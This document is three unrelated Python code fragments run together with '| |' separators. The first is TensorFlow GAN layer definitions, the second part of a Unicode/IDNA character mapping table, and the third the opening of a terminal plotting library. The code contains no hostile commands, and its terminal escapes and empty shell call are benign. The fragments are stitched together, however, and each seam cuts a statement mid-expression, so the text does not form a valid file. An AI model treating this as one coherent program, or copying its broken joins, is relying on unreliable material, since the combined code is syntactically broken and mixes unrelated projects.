w = tf.get_variable("kernel", shape=[kernel, kernel, channels, x.get_shape()[-1]], initializer=weight_init, regularizer=opt.get("conv", {}).get("regularizer", None), dtype=gan_dtype)
x = tf.nn.conv2d_transpose(x, filter=spectral_norm(w), output_shape=output_shape, strides=[1, stride, stride, 1], padding=padding)
if use_bias :
bias = tf.get_variable("bias", [channels], initializer=tf.constant_initializer(0.0), dtype=gan_dtype)
x = tf.nn.bias_add(x, bias)
else :
x = tf.layers.conv2d_transpose(inputs=x, filters=channels,
kernel_size=kernel, kernel_initializer=weight_init, kernel_regularizer=opt.get("conv", {}).get("regularizer", None),
strides=stride, padding=padding, use_bias=use_bias)
return x
def get_variable_with_custom_lr(name, shape, regularizer, lrmul):
w = tf.get_variable(name, shape, gan_dtype, initializer=tf.truncated_normal_initializer(mean=0.0, stddev=0.02/lrmul), regularizer=regularizer)
if (lrmul==1.0):
return w
else:
return w * lrmul
def fully_connected(x, units, opt, use_bias=True, lrmul=1.0, scope='fully_0'):
with tf.variable_scope(scope) as full_scope:
x = flatten(x)
shape = x.get_shape().as_list()
channels = shape[-1]
if opt.get("conv", {}).get("sn", True):
if 'generator' in full_scope.name:
w = get_variable_with_custom_lr("kernel", shape=[channels, units], regularizer=opt["fc_regularizer"], lrmul=lrmul)
else :
w = get_variable_with_custom_lr("kernel", shape=[channels, units], regularizer=None, lrmul=lrmul)
if use_bias :
bias = tf.get_variable("bias", [units], initializer=tf.constant_initializer(0.0), dtype=gan_dtype)
x = tf.matmul(x, spectral_norm(w)) + bias
else :
x = tf.matmul(x, spectral_norm(w))
else :
if 'generator' in full_scope.name:
x = tf.layers.dense(x, units=units, kernel_initializer=weight_init,
kernel_regularizer=opt["fc_regularizer"], use_bias=use_bias)
else :
x = tf.layers.dense(x, units=units, kernel_initializer=weight_init,
kernel_regularizer=None, use_bias=use_bias)
return x
def flatten(x) :
return tf.layers.flatten(x)
def hw_flatten(x) :
return tf.reshape(x, shape=[x.shape[0], -1, x.shape[-1]])
##################################################################################
# Residual-block, Self-Attention-block
##################################################################################
def resblock(x_init, channels, opt, use_bias=True, scope='resblock'):
with tf.variable_scope(scope):
with tf.variable_scope('res1'):
x = conv(x_init, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
if (opt["bn_in_d"]): x = bn(x, opt=opt)
x = opt["act"](x)
with tf.variable_scope('res2'):
x = conv(x, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
if (opt["bn_in_d"]): x = bn(x, opt=opt)
return x + x_init
def upconv(x, channels, opt, use_bias=True):
if opt["upsampling_method"] == 'deconv3':
return deconv(x, channels, kernel=3, stride=2, use_bias=use_bias, opt=opt)
elif opt["upsampling_method"] == 'deconv4':
return deconv(x, channels, kernel=4, stride=2, use_bias=use_bias, opt=opt)
elif opt["upsampling_method"] == 'deconv6':
return deconv(x, channels, kernel=6, stride=2, use_bias=use_bias, opt=opt)
elif opt["upsampling_method"] == 'subpixel2':
return subpixel_conv(x, channels, kernel=2, scale=2, use_bias=use_bias, opt=opt)
elif opt["upsampling_method"] == 'subpixel3':
return subpixel_conv(x, channels, kernel=3, scale=2, use_bias=use_bias, opt=opt)
elif opt["upsampling_method"] == 'resize_conv':
x = up_sample(x, 2)
x = conv(x, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
return x
elif opt["upsampling_method"]=='nn':
return up_sample(x, 2)
else: raise ValueError("Invalid upsampling method specified: "+str(opt["upsampling_method"]))
def g_conv(x, channels, opt, use_bias=True):
if opt["g_conv"] == 'deconv3':
return deconv(x, channels, kernel=3, stride=1, use_bias=use_bias, opt=opt)
elif opt["g_conv"] == 'deconv4':
return deconv(x, channels, kernel=4, stride=1, use_bias=use_bias, opt=opt)
elif opt["g_conv"] == 'conv3':
return conv(x, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
elif opt["g_conv"] == 'conv5':
return conv(x, channels, kernel=5, stride=1, pad=2, use_bias=use_bias, opt=opt)
else: raise ValueError("Invalid generator convolution type specified: "+str(opt["g_conv"]))
def resblock_up(x_init, channels, opt, use_bias=True, scope='resblock_up'):
with tf.variable_scope(scope):
with tf.variable_scope('res1'):
x = bn(x_init, opt=opt)
x = opt["act"](x)
x = upconv(x, channels, use_bias=use_bias, opt=opt)
with tf.variable_scope('res2') :
x = bn(x, opt=opt)
x = opt["act"](x)
x = g_conv(x, channels, use_bias=use_bias, opt=opt)
with tf.variable_scope('skip') :
x_init = upconv(x_init, channels, use_bias=use_bias, opt=opt)
return x + x_init
def resblock_up_condition(x_init, z, channels, opt, use_bias=True, scope='resblock_up'):
with tf.variable_scope(scope):
with tf.variable_scope('res1'):
x = cond_bn(x_init, z, opt=opt)
x = opt["act"](x)
x = upconv(x, channels, use_bias=use_bias, opt=opt)
with tf.variable_scope('res2') :
x = cond_bn(x, z, opt=opt)
x = opt["act"](x)
x = g_conv(x, channels, use_bias=use_bias, opt=opt)
with tf.variable_scope('skip') :
x_init = upconv(x_init, channels, use_bias=use_bias, opt=opt)
return x + x_init
def downconv(x, channels, opt, use_bias=True, method=None):
if method==None:
method = opt["downsampling_method"]
if method == 'strided_conv3':
return conv(x, channels, kernel=3, stride=2, pad=1, use_bias=use_bias, opt=opt)
elif method == 'resize_conv1':
x = conv(x, channels, kernel=1, stride=1, pad=0, use_bias=use_bias, opt=opt)
return avg_pooling(x)
elif method == 'resize_conv3':
x = conv(x, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
return avg_pooling(x)
elif method == 'resize_conv35':
channels5 = int(channels*0.333333333334)
channels3 = channels - channels5
x = conv(x, channels, kernel=str(channels3)+"x3,"+str(channels5)+"x5", stride=1, pad=1, use_bias=use_bias, opt=opt)
return avg_pooling(x)
elif method == 'pool_only':
return avg_pooling(x)
elif method == 'max_pool_only':
return max_pooling(x)
else: raise ValueError("Invalid downsampling method specified: "+str(method))
def resblock_down(x_init, channels, opt, use_bias=True, scope='resblock_down'):
with tf.variable_scope(scope):
with tf.variable_scope('res1'):
if (opt["bn_in_d"]): x = bn(x_init, opt=opt)
else: x = x_init
x = opt["act"](x)
res_method = opt["downsampling_method"]
if res_method!='strided_conv3':
res_method = 'resize_conv3'
x = downconv(x, channels, use_bias=use_bias, opt=opt, method=res_method)
with tf.variable_scope('res2') :
if (opt["bn_in_d"]): x = bn(x, opt=opt)
x = opt["act"](x)
x = conv(x, channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
with tf.variable_scope('skip') :
x_init = downconv(x_init, channels, use_bias=use_bias, opt=opt, method=opt["downsampling_method"])
return x + x_init
def resblock_up_cond_deep(x_init, z, channels_out, opt, upscale=True, use_bias=True, scope='deep_resblock'):
channels_in = int(x_init.get_shape()[-1])
inner_channels = round_up((channels_in + channels_out)//6, 8)
with tf.variable_scope(scope):
with tf.variable_scope('bottleneck'):
x = cond_bn(x_init, z, opt=opt)
x = opt["act"](x)
x = conv(x, inner_channels, kernel=1, stride=1, use_bias=False, opt=opt)
with tf.variable_scope('upscale'):
x = cond_bn(x, z, opt=opt)
x = opt["act"](x)
if upscale:
x = upconv(x, inner_channels, use_bias=False, opt=opt)
with tf.variable_scope('inner1'):
x = g_conv(x, inner_channels, use_bias=False, opt=opt)
x = cond_bn(x, z, opt=opt)
x = opt["act"](x)
with tf.variable_scope('inner2'):
x = g_conv(x, inner_channels, use_bias=False, opt=opt)
x = bn(x, opt=opt)
x = opt["act"](x)
with tf.variable_scope('proj'):
x = conv(x, channels_out, kernel=1, stride=1, use_bias=use_bias, opt=opt)
with tf.variable_scope('skip'):
if channels_in != channels_out:
print(inner_channels, channels_in, channels_out, channels_in - channels_out)
kept, dropped = tf.split(x_init, num_or_size_splits=[channels_out, channels_in - channels_out], axis=-1)
else:
kept = x_init
if upscale:
x_init = upconv(kept, channels_out, use_bias=use_bias, opt=opt)
return x + x_init
def resblock_down_deep(x_init, channels_out, opt, downscale=True, use_bias=True, scope='deep_resblock'):
channels_in = x_init.get_shape()[-1]
inner_channels = round_up((channels_in + channels_out)//6, 8)
with tf.variable_scope(scope):
with tf.variable_scope('bottleneck'):
x = x_init
if (opt["bn_in_d"]): x = bn(x, opt=opt)
x = opt["act"](x)
x = conv(x, inner_channels, kernel=1, stride=1, pad=0, use_bias=use_bias, opt=opt)
with tf.variable_scope('inner1'):
if (opt["bn_in_d"]): x = bn(x, opt=opt)
x = opt["act"](x)
x = conv(x, inner_channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
with tf.variable_scope('inner2'):
if (opt["bn_in_d"]): x = bn(x, opt=opt)
x = opt["act"](x)
x = conv(x, inner_channels, kernel=3, stride=1, pad=1, use_bias=use_bias, opt=opt)
with tf.variable_scope('downscale'):
x = opt["act"](x)
if downscale:
x = downconv(x, inner_channels, use_bias=use_bias, opt=opt, method='pool_only')
with tf.variable_scope('proj'):
x = conv(x, channels_out, kernel=1, stride=1, pad=0, use_bias=use_bias, opt=opt)
with tf.variable_scope('skip'):
if downscale:
x_init = downconv(x_init, channels_in, use_bias=use_bias, opt=opt, method='pool_only')
if channels_in != channels_out:
conv_ch = channels_out - channels_in
dense = conv(x_init, conv_ch, kernel=1, stride=1, pad=0, use_bias=use_bias, opt=opt)
x_init = tf.concat([x_init, | |
(0x1FC7, 'M', u'ῆι'),
(0x1FC8, 'M', u'ὲ'),
(0x1FC9, 'M', u'έ'),
(0x1FCA, 'M', u'ὴ'),
(0x1FCB, 'M', u'ή'),
(0x1FCC, 'M', u'ηι'),
(0x1FCD, '3', u' ̓̀'),
(0x1FCE, '3', u' ̓́'),
(0x1FCF, '3', u' ̓͂'),
(0x1FD0, 'V'),
(0x1FD3, 'M', u'ΐ'),
(0x1FD4, 'X'),
(0x1FD6, 'V'),
(0x1FD8, 'M', u'ῐ'),
(0x1FD9, 'M', u'ῑ'),
(0x1FDA, 'M', u'ὶ'),
(0x1FDB, 'M', u'ί'),
(0x1FDC, 'X'),
(0x1FDD, '3', u' ̔̀'),
(0x1FDE, '3', u' ̔́'),
(0x1FDF, '3', u' ̔͂'),
(0x1FE0, 'V'),
(0x1FE3, 'M', u'ΰ'),
(0x1FE4, 'V'),
(0x1FE8, 'M', u'ῠ'),
(0x1FE9, 'M', u'ῡ'),
(0x1FEA, 'M', u'ὺ'),
(0x1FEB, 'M', u'ύ'),
(0x1FEC, 'M', u'ῥ'),
(0x1FED, '3', u' ̈̀'),
(0x1FEE, '3', u' ̈́'),
(0x1FEF, '3', u'`'),
(0x1FF0, 'X'),
(0x1FF2, 'M', u'ὼι'),
(0x1FF3, 'M', u'ωι'),
(0x1FF4, 'M', u'ώι'),
(0x1FF5, 'X'),
(0x1FF6, 'V'),
(0x1FF7, 'M', u'ῶι'),
(0x1FF8, 'M', u'ὸ'),
(0x1FF9, 'M', u'ό'),
(0x1FFA, 'M', u'ὼ'),
(0x1FFB, 'M', u'ώ'),
(0x1FFC, 'M', u'ωι'),
(0x1FFD, '3', u' ́'),
(0x1FFE, '3', u' ̔'),
(0x1FFF, 'X'),
(0x2000, '3', u' '),
(0x200B, 'I'),
(0x200C, 'D', u''),
(0x200E, 'X'),
(0x2010, 'V'),
(0x2011, 'M', u'‐'),
(0x2012, 'V'),
(0x2017, '3', u' ̳'),
(0x2018, 'V'),
(0x2024, 'X'),
(0x2027, 'V'),
(0x2028, 'X'),
(0x202F, '3', u' '),
(0x2030, 'V'),
(0x2033, 'M', u'′′'),
(0x2034, 'M', u'′′′'),
(0x2035, 'V'),
(0x2036, 'M', u'‵‵'),
(0x2037, 'M', u'‵‵‵'),
]
def _seg_21():
return [
(0x2038, 'V'),
(0x203C, '3', u'!!'),
(0x203D, 'V'),
(0x203E, '3', u' ̅'),
(0x203F, 'V'),
(0x2047, '3', u'??'),
(0x2048, '3', u'?!'),
(0x2049, '3', u'!?'),
(0x204A, 'V'),
(0x2057, 'M', u'′′′′'),
(0x2058, 'V'),
(0x205F, '3', u' '),
(0x2060, 'I'),
(0x2061, 'X'),
(0x2064, 'I'),
(0x2065, 'X'),
(0x2070, 'M', u'0'),
(0x2071, 'M', u'i'),
(0x2072, 'X'),
(0x2074, 'M', u'4'),
(0x2075, 'M', u'5'),
(0x2076, 'M', u'6'),
(0x2077, 'M', u'7'),
(0x2078, 'M', u'8'),
(0x2079, 'M', u'9'),
(0x207A, '3', u'+'),
(0x207B, 'M', u'−'),
(0x207C, '3', u'='),
(0x207D, '3', u'('),
(0x207E, '3', u')'),
(0x207F, 'M', u'n'),
(0x2080, 'M', u'0'),
(0x2081, 'M', u'1'),
(0x2082, 'M', u'2'),
(0x2083, 'M', u'3'),
(0x2084, 'M', u'4'),
(0x2085, 'M', u'5'),
(0x2086, 'M', u'6'),
(0x2087, 'M', u'7'),
(0x2088, 'M', u'8'),
(0x2089, 'M', u'9'),
(0x208A, '3', u'+'),
(0x208B, 'M', u'−'),
(0x208C, '3', u'='),
(0x208D, '3', u'('),
(0x208E, '3', u')'),
(0x208F, 'X'),
(0x2090, 'M', u'a'),
(0x2091, 'M', u'e'),
(0x2092, 'M', u'o'),
(0x2093, 'M', u'x'),
(0x2094, 'M', u'ə'),
(0x2095, 'M', u'h'),
(0x2096, 'M', u'k'),
(0x2097, 'M', u'l'),
(0x2098, 'M', u'm'),
(0x2099, 'M', u'n'),
(0x209A, 'M', u'p'),
(0x209B, 'M', u's'),
(0x209C, 'M', u't'),
(0x209D, 'X'),
(0x20A0, 'V'),
(0x20A8, 'M', u'rs'),
(0x20A9, 'V'),
(0x20C0, 'X'),
(0x20D0, 'V'),
(0x20F1, 'X'),
(0x2100, '3', u'a/c'),
(0x2101, '3', u'a/s'),
(0x2102, 'M', u'c'),
(0x2103, 'M', u'°c'),
(0x2104, 'V'),
(0x2105, '3', u'c/o'),
(0x2106, '3', u'c/u'),
(0x2107, 'M', u'ɛ'),
(0x2108, 'V'),
(0x2109, 'M', u'°f'),
(0x210A, 'M', u'g'),
(0x210B, 'M', u'h'),
(0x210F, 'M', u'ħ'),
(0x2110, 'M', u'i'),
(0x2112, 'M', u'l'),
(0x2114, 'V'),
(0x2115, 'M', u'n'),
(0x2116, 'M', u'no'),
(0x2117, 'V'),
(0x2119, 'M', u'p'),
(0x211A, 'M', u'q'),
(0x211B, 'M', u'r'),
(0x211E, 'V'),
(0x2120, 'M', u'sm'),
(0x2121, 'M', u'tel'),
(0x2122, 'M', u'tm'),
(0x2123, 'V'),
(0x2124, 'M', u'z'),
(0x2125, 'V'),
(0x2126, 'M', u'ω'),
(0x2127, 'V'),
(0x2128, 'M', u'z'),
(0x2129, 'V'),
]
def _seg_22():
return [
(0x212A, 'M', u'k'),
(0x212B, 'M', u'å'),
(0x212C, 'M', u'b'),
(0x212D, 'M', u'c'),
(0x212E, 'V'),
(0x212F, 'M', u'e'),
(0x2131, 'M', u'f'),
(0x2132, 'X'),
(0x2133, 'M', u'm'),
(0x2134, 'M', u'o'),
(0x2135, 'M', u'א'),
(0x2136, 'M', u'ב'),
(0x2137, 'M', u'ג'),
(0x2138, 'M', u'ד'),
(0x2139, 'M', u'i'),
(0x213A, 'V'),
(0x213B, 'M', u'fax'),
(0x213C, 'M', u'π'),
(0x213D, 'M', u'γ'),
(0x213F, 'M', u'π'),
(0x2140, 'M', u'∑'),
(0x2141, 'V'),
(0x2145, 'M', u'd'),
(0x2147, 'M', u'e'),
(0x2148, 'M', u'i'),
(0x2149, 'M', u'j'),
(0x214A, 'V'),
(0x2150, 'M', u'1⁄7'),
(0x2151, 'M', u'1⁄9'),
(0x2152, 'M', u'1⁄10'),
(0x2153, 'M', u'1⁄3'),
(0x2154, 'M', u'2⁄3'),
(0x2155, 'M', u'1⁄5'),
(0x2156, 'M', u'2⁄5'),
(0x2157, 'M', u'3⁄5'),
(0x2158, 'M', u'4⁄5'),
(0x2159, 'M', u'1⁄6'),
(0x215A, 'M', u'5⁄6'),
(0x215B, 'M', u'1⁄8'),
(0x215C, 'M', u'3⁄8'),
(0x215D, 'M', u'5⁄8'),
(0x215E, 'M', u'7⁄8'),
(0x215F, 'M', u'1⁄'),
(0x2160, 'M', u'i'),
(0x2161, 'M', u'ii'),
(0x2162, 'M', u'iii'),
(0x2163, 'M', u'iv'),
(0x2164, 'M', u'v'),
(0x2165, 'M', u'vi'),
(0x2166, 'M', u'vii'),
(0x2167, 'M', u'viii'),
(0x2168, 'M', u'ix'),
(0x2169, 'M', u'x'),
(0x216A, 'M', u'xi'),
(0x216B, 'M', u'xii'),
(0x216C, 'M', u'l'),
(0x216D, 'M', u'c'),
(0x216E, 'M', u'd'),
(0x216F, 'M', u'm'),
(0x2170, 'M', u'i'),
(0x2171, 'M', u'ii'),
(0x2172, 'M', u'iii'),
(0x2173, 'M', u'iv'),
(0x2174, 'M', u'v'),
(0x2175, 'M', u'vi'),
(0x2176, 'M', u'vii'),
(0x2177, 'M', u'viii'),
(0x2178, 'M', u'ix'),
(0x2179, 'M', u'x'),
(0x217A, 'M', u'xi'),
(0x217B, 'M', u'xii'),
(0x217C, 'M', u'l'),
(0x217D, 'M', u'c'),
(0x217E, 'M', u'd'),
(0x217F, 'M', u'm'),
(0x2180, 'V'),
(0x2183, 'X'),
(0x2184, 'V'),
(0x2189, 'M', u'0⁄3'),
(0x218A, 'V'),
(0x218C, 'X'),
(0x2190, 'V'),
(0x222C, 'M', u'∫∫'),
(0x222D, 'M', u'∫∫∫'),
(0x222E, 'V'),
(0x222F, 'M', u'∮∮'),
(0x2230, 'M', u'∮∮∮'),
(0x2231, 'V'),
(0x2260, '3'),
(0x2261, 'V'),
(0x226E, '3'),
(0x2270, 'V'),
(0x2329, 'M', u'〈'),
(0x232A, 'M', u'〉'),
(0x232B, 'V'),
(0x2427, 'X'),
(0x2440, 'V'),
(0x244B, 'X'),
(0x2460, 'M', u'1'),
(0x2461, 'M', u'2'),
]
def _seg_23():
return [
(0x2462, 'M', u'3'),
(0x2463, 'M', u'4'),
(0x2464, 'M', u'5'),
(0x2465, 'M', u'6'),
(0x2466, 'M', u'7'),
(0x2467, 'M', u'8'),
(0x2468, 'M', u'9'),
(0x2469, 'M', u'10'),
(0x246A, 'M', u'11'),
(0x246B, 'M', u'12'),
(0x246C, 'M', u'13'),
(0x246D, 'M', u'14'),
(0x246E, 'M', u'15'),
(0x246F, 'M', u'16'),
(0x2470, 'M', u'17'),
(0x2471, 'M', u'18'),
(0x2472, 'M', u'19'),
(0x2473, 'M', u'20'),
(0x2474, '3', u'(1)'),
(0x2475, '3', u'(2)'),
(0x2476, '3', u'(3)'),
(0x2477, '3', u'(4)'),
(0x2478, '3', u'(5)'),
(0x2479, '3', u'(6)'),
(0x247A, '3', u'(7)'),
(0x247B, '3', u'(8)'),
(0x247C, '3', u'(9)'),
(0x247D, '3', u'(10)'),
(0x247E, '3', u'(11)'),
(0x247F, '3', u'(12)'),
(0x2480, '3', u'(13)'),
(0x2481, '3', u'(14)'),
(0x2482, '3', u'(15)'),
(0x2483, '3', u'(16)'),
(0x2484, '3', u'(17)'),
(0x2485, '3', u'(18)'),
(0x2486, '3', u'(19)'),
(0x2487, '3', u'(20)'),
(0x2488, 'X'),
(0x249C, '3', u'(a)'),
(0x249D, '3', u'(b)'),
(0x249E, '3', u'(c)'),
(0x249F, '3', u'(d)'),
(0x24A0, '3', u'(e)'),
(0x24A1, '3', u'(f)'),
(0x24A2, '3', u'(g)'),
(0x24A3, '3', u'(h)'),
(0x24A4, '3', u'(i)'),
(0x24A5, '3', u'(j)'),
(0x24A6, '3', u'(k)'),
(0x24A7, '3', u'(l)'),
(0x24A8, '3', u'(m)'),
(0x24A9, '3', u'(n)'),
(0x24AA, '3', u'(o)'),
(0x24AB, '3', u'(p)'),
(0x24AC, '3', u'(q)'),
(0x24AD, '3', u'(r)'),
(0x24AE, '3', u'(s)'),
(0x24AF, '3', u'(t)'),
(0x24B0, '3', u'(u)'),
(0x24B1, '3', u'(v)'),
(0x24B2, '3', u'(w)'),
(0x24B3, '3', u'(x)'),
(0x24B4, '3', u'(y)'),
(0x24B5, '3', u'(z)'),
(0x24B6, 'M', u'a'),
(0x24B7, 'M', u'b'),
(0x24B8, 'M', u'c'),
(0x24B9, 'M', u'd'),
(0x24BA, 'M', u'e'),
(0x24BB, 'M', u'f'),
(0x24BC, 'M', u'g'),
(0x24BD, 'M', u'h'),
(0x24BE, 'M', u'i'),
(0x24BF, 'M', u'j'),
(0x24C0, 'M', u'k'),
(0x24C1, 'M', u'l'),
(0x24C2, 'M', u'm'),
(0x24C3, 'M', u'n'),
(0x24C4, 'M', u'o'),
(0x24C5, 'M', u'p'),
(0x24C6, 'M', u'q'),
(0x24C7, 'M', u'r'),
(0x24C8, 'M', u's'),
(0x24C9, 'M', u't'),
(0x24CA, 'M', u'u'),
(0x24CB, 'M', u'v'),
(0x24CC, 'M', u'w'),
(0x24CD, 'M', u'x'),
(0x24CE, 'M', u'y'),
(0x24CF, 'M', u'z'),
(0x24D0, 'M', u'a'),
(0x24D1, 'M', u'b'),
(0x24D2, 'M', u'c'),
(0x24D3, 'M', u'd'),
(0x24D4, 'M', u'e'),
(0x24D5, 'M', u'f'),
(0x24D6, 'M', u'g'),
(0x24D7, 'M', u'h'),
(0x24D8, 'M', u'i'),
]
def _seg_24():
return [
(0x24D9, 'M', u'j'),
(0x24DA, 'M', u'k'),
(0x24DB, 'M', u'l'),
(0x24DC, 'M', u'm'),
(0x24DD, 'M', u'n'),
(0x24DE, 'M', u'o'),
(0x24DF, 'M', u'p'),
(0x24E0, 'M', u'q'),
(0x24E1, 'M', u'r'),
(0x24E2, 'M', u's'),
(0x24E3, 'M', u't'),
(0x24E4, 'M', u'u'),
(0x24E5, 'M', u'v'),
(0x24E6, 'M', u'w'),
(0x24E7, 'M', u'x'),
(0x24E8, 'M', u'y'),
(0x24E9, 'M', u'z'),
(0x24EA, 'M', u'0'),
(0x24EB, 'V'),
(0x2A0C, 'M', u'∫∫∫∫'),
(0x2A0D, 'V'),
(0x2A74, '3', u'::='),
(0x2A75, '3', u'=='),
(0x2A76, '3', u'==='),
(0x2A77, 'V'),
(0x2ADC, 'M', u'⫝̸'),
(0x2ADD, 'V'),
(0x2B74, 'X'),
(0x2B76, 'V'),
(0x2B96, 'X'),
(0x2B98, 'V'),
(0x2BC9, 'X'),
(0x2BCA, 'V'),
(0x2BFF, 'X'),
(0x2C00, 'M', u'ⰰ'),
(0x2C01, 'M', u'ⰱ'),
(0x2C02, 'M', u'ⰲ'),
(0x2C03, 'M', u'ⰳ'),
(0x2C04, 'M', u'ⰴ'),
(0x2C05, 'M', u'ⰵ'),
(0x2C06, 'M', u'ⰶ'),
(0x2C07, 'M', u'ⰷ'),
(0x2C08, 'M', u'ⰸ'),
(0x2C09, 'M', u'ⰹ'),
(0x2C0A, 'M', u'ⰺ'),
(0x2C0B, 'M', u'ⰻ'),
(0x2C0C, 'M', u'ⰼ'),
(0x2C0D, 'M', u'ⰽ'),
(0x2C0E, 'M', u'ⰾ'),
(0x2C0F, 'M', u'ⰿ'),
(0x2C10, 'M', u'ⱀ'),
(0x2C11, 'M', u'ⱁ'),
(0x2C12, 'M', u'ⱂ'),
(0x2C13, 'M', u'ⱃ'),
(0x2C14, 'M', u'ⱄ'),
(0x2C15, 'M', u'ⱅ'),
(0x2C16, 'M', u'ⱆ'),
(0x2C17, 'M', u'ⱇ'),
(0x2C18, 'M', u'ⱈ'),
(0x2C19, 'M', u'ⱉ'),
(0x2C1A, 'M', u'ⱊ'),
(0x2C1B, 'M', u'ⱋ'),
(0x2C1C, 'M', u'ⱌ'),
(0x2C1D, 'M', u'ⱍ'),
(0x2C1E, 'M', u'ⱎ'),
(0x2C1F, 'M', u'ⱏ'),
(0x2C20, 'M', u'ⱐ'),
(0x2C21, 'M', u'ⱑ'),
(0x2C22, 'M', u'ⱒ'),
(0x2C23, 'M', u'ⱓ'),
(0x2C24, 'M', u'ⱔ'),
(0x2C25, 'M', u'ⱕ'),
(0x2C26, 'M', u'ⱖ'),
(0x2C27, 'M', u'ⱗ'),
(0x2C28, 'M', u'ⱘ'),
(0x2C29, 'M', u'ⱙ'),
(0x2C2A, 'M', | |
# /usr/bin/env python3
# -*- coding: utf-8 -*-
##############################################
############## Importing ###############
##############################################
import utility as _utility
import docstrings as _docstrings
import subprocess as _subprocess
##############################################
########### Initialization #############
##############################################
_platform = _utility.platform()
#_platform = "windows"
if _platform == "windows":
_subprocess.call('', shell = True)
_utility.marker.pop('small')
_utility.marker_sequence.remove('small')
_shell = _utility.shell()
##############################################
########## Basic Containers ############
##############################################
class _figure():
def __init__(self):
self.width = None
self.height = None
self.rows = 1
self.cols = 1
self.set_subplots()
self.row = 0
self.col = 0
self.set_subplot()
self.canvas = ""
def set_subplots(self):
self.subplots = [[_subplot(r, c) for c in range(self.cols)] for r in range(self.rows)]
def get_subplot(self, row = 0 , col = 0):
return self.subplots[row - 1][col - 1]
def set_subplot(self):
self.subplot = self.subplots[self.row][self.col]
class _subplot():
def __init__(self, row, col):
self.row = row
self.col = col
self.yaxis = []
self.label = []
self.label_show = []
self.point_marker = []
self.line_marker = []
self.point_color = []
self.line_color = []
self.x = []
self.y = []
self.signals = 0
self.fillx = []
self.filly = []
self.width = None
self.height = None
self.width_set = None
self.height_set = None
self.title = ""
self.xlabel = ""
self.ylabel = ["", ""]
self.xaxes = [True, True]
self.yaxes = [True, True]
self.grid = [False, False]
self.axes_color = "white"
self.ticks_color = "black"
self.canvas_color = "white"
self.xlim_plot = [None, None]
self.ylim_plot_left = [None, None]
self.ylim_plot_right = [None, None]
self.xticks, self.xlabels = [], []
self.yticks_left, self.ylabels_left = [], []
self.yticks_right, self.ylabels_right = [], []
self.ticks = [5, 7]
self.xscale = "linear"
self.yscale = ["linear", "linear"]
_fig = _figure()
#figure = _fig
#utility = _utility
##############################################
######### Subplots Function ############
##############################################
def subplots(rows = None, cols = None, ):
rows, cols = _utility.set_first_to_both(rows, cols)
_set_rows(rows)
_set_cols(cols)
_fig.set_subplots()
subplot(1, 1)
subplots.__doc__ = _docstrings.subplots_doc
def _set_cols(cols = None):
cols = _utility.set_if_none(cols, 1)
_fig.cols = cols
def _set_rows(rows = None):
rows = _utility.set_if_none(rows, 1)
_fig.rows = rows
def subplot(row = 1, col = 1):
_set_row(row)
_set_col(col)
_fig.set_subplot()
subplot.__doc__ = _docstrings.subplot_doc
def _set_col(col = None):
col = _utility.set_if_none(col, 1)
_fig.col = col - 1
def _set_row(row = None):
row = _utility.set_if_none(row, 1)
_fig.row = row - 1
subplots(1, 1)
subplot(1, 1)
##############################################
####### Draw Related Functions #########
##############################################
def _draw(*args, **kwargs):
_yaxis(kwargs.get("yaxis"))
_label(kwargs.get("label"))
_point_marker(kwargs.get("point_marker"))
_line_marker(kwargs.get("line_marker"))
_point_color(kwargs.get("point_color"))
_line_color(kwargs.get("line_color"))
_data(*args)
_fillx(kwargs.get("fillx"))
_filly(kwargs.get("filly"))
def _yaxis(axis = None):
axis_none = "left"
axis = _utility.set_if_none(axis, axis_none)
axis = "left" if axis != "left" and axis != "right" else axis
_fig.subplot.yaxis.append(axis)
def _label(label = None):
label_none = ""
label = _utility.set_if_none(label, label_none)
label_show = True
_fig.subplot.label.append(label)
_fig.subplot.label_show.append(label_show)
#To-do: data with same label
def _point_marker(marker = None):
index = len(set(_fig.subplot.point_marker)) % len(_utility.marker_sequence)
marker_none = _utility.marker_sequence[index]
marker = "" if marker == "" else marker
marker = _utility.set_if_none(marker, marker_none)
small_test = marker == "small" and _platform == "linux"
marker = _utility.marker[marker] if marker in _utility.marker and not small_test else marker
marker = "small" if small_test else (marker[0] if len(marker) > 0 else marker)
_fig.subplot.point_marker.append(marker)
def _line_marker(marker = None):
index = len(set(_fig.subplot.line_marker)) % len(_utility.marker_sequence)
marker_none = _utility.marker_sequence[index]
marker = "" if marker == "" else marker
marker = _utility.set_if_none(marker, marker_none)
small_test = marker == "small" and _platform == "linux"
marker = _utility.marker[marker] if marker in _utility.marker and not small_test else marker
marker = "small" if small_test else (marker[0] if len(marker) > 0 else marker)
_fig.subplot.line_marker.append(marker)
def _point_color(color = None):
color = None if color not in _utility.color_sequence else color
index = len(set(_fig.subplot.point_color)) % len(_utility.color_sequence)
color_none = _utility.color_sequence[index]
color = _utility.set_if_none(color, color_none)
_fig.subplot.point_color.append(color)
def _line_color(color = None):
color = None if color not in _utility.color_sequence else color
index = len(set(_fig.subplot.line_color)) % len(_utility.color_sequence)
color_none = _utility.color_sequence[index]
color = _utility.set_if_none(color, color_none)
_fig.subplot.line_color.append(color)
def _data(*args):
x, y = _utility.get_data(*args)
_fig.subplot.x.append(x)
_fig.subplot.y.append(y)
_fig.subplot.signals += 1
def _fillx(fill = None):
fill = _utility.set_if_none(fill, False)
fill = bool(fill)
_fig.subplot.fillx.append(fill)
def _filly(fill = None):
fill = _utility.set_if_none(fill, False)
fill = bool(fill)
_fig.subplot.filly.append(fill)
##############################################
########### Clear Functions ############
##############################################
def clear_terminal():
_utility.write('\033c')
_utility._terminal_printed_lines_cnt = 0
clear_terminal.__doc__ = _docstrings.clear_terminal_doc
clt = clear_terminal
def clear_terminal_printed_lines():
# clear the lines that plotext had printed
# (plus 1 because the last line would not has an \n at the end)
n = _utility._terminal_printed_lines_cnt + 1
for i in range(n):
_utility.write("\033[2K")
if i < n - 1:
_utility.write("\033[A")
_utility.write("\033[2K")
_utility._terminal_printed_lines_cnt = 0
def clear_figure():
_fig.__init__()
clear_figure.__doc__ = _docstrings.clear_figure_doc
clf = clear_figure
def clear_plot():
_fig.subplot.__init__(_fig.row, _fig.col)
clear_plot.__doc__ = _docstrings.clear_plot_doc
clp = clear_plot
def clear_data():
_fig.subplot.x = []
_fig.subplot.y = []
